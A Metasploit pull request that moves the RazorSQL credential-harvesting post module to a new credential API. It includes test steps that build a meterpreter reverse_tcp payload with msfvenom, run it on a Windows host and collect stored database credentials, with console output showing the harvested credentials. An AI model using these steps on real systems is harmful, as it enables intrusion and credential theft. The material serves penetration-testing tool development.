### PR TITLE
Update razorsql to use the new cred API

### PR DESCRIPTION
**Pull request by wchen-r7**
This patch updates the razorsql post module to use the new credential API.
- [x] Get Windows 7
- [x] Install [razorsql](http://downloads.razorsql.com/downloads/6_3_24/razorsql6_3_24_setup.exe)
- [x] Open RazorSQL, click on "Click on connect to a Database", and then you can create a profile there.
- [x] Start msfconsole
- [x] Do: `workspace -a razor`
- [x] Do: `use exploit/multi/handler`
- [x] Do: `run`
- [x] Create a new payload: `./msfvenom -p windows/meterpreter/reverse_tcp lhost=[Your IP] lport=4444 -f exe -o /tmp/payload.exe`
- [x] Drag and drop the payload to the Windows box, execute it to get a shell
- [x] At the meterpreter prompt, do: `run post/windows/gather/credentials/razorsql`
- [x] You should see credentials being collected
- [x] At the meterpreter prompt, do: `background`
- [x] Do: `creds`
- [x] You should see your database creds

### CODE REVIEW

File: modules/post/windows/gather/credentials/razorsql.rb [hunk 1]
```diff
@@ -30,6 +31,48 @@ def initialize(info={})
...
+      workspace_id: myworkspace_id
+    }
+
+    credential_data = {
+      module_fullname: fullname,
+      post_reference_name: self.refname,
+      session_id: session_db_id,
+      origin_type: :session,
+      private_data: opts[:password],
+      private_type: :password,
```
Comment (jvazquez-r7) [inline modules/post/windows/gather/credentials/razorsql.rb]: It is what I got on testing. The password looks like encrypted so I guess the private_type should be `:nonreplayable_hash` ? Maybe add the `jtr_format` if iknown.

```
msf exploit(handler) > run

[*] Started reverse handler on 172.16.158.1:4444
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 172.16.158.131
[*] Meterpreter session 1 opened (172.16.158.1:4444 -> 172.16.158.131:49198) at 2015-06-12 11:16:29 -0500

meterpreter > run post/windows/gather/credentials/razorsql

[*] Checking All Users...
RazorSQL User Credentials
=========================

 Username  Password                                Type   Host       Port  Database Name  Database
 --------  --------                                ----   ----       ----  -------------  --------

 test      {{{VFWkNh3l3nYxvYzassfuNC8aw==!^*#$RIG  MySQL  127.0.0.1        test           MySQL

[*] User credentials stored in: /Users/jvazquez/.msf4/loot/20150612111643_razor_172.16.158.131_razor.user.creds_929859.txt
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.158.131 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > creds
Credentials
===========

host            service        public  private                                 realm  private_type
----            -------        ------  -------                                 -----  ------------
172.16.158.131  0/tcp (MySQL)  test    {{{VFWkNh3l3nYxvYzassfuNC8aw==!^*#$RIG         Password
```

**Comment by void-in** [comment]
@jvazquez-r7 That's right. @wchen-r7 created https://github.com/rapid7/metasploit-framework/issues/5469 for tracking the decryption issue. The initial five characters {{{VF and the last 8 characters !^*#$RIG are the same for every password. The middle characters is the encrypted password.

**Comment by wchen-r7** [comment]
Definitely not a hash. Some type of substitution cipher.

**Comment by wchen-r7** [comment]
Let me put this on hold until Egypt or Dave comes back from vaca.

**Comment by wchen-r7** [comment]
@jvazquez-r7 The new code looks good, don't think we need to wait for anybody anymore. thanks!

**Comment by jvazquez-r7** [comment]
right, password not encrypted anymore! landing!

**Pull request merged**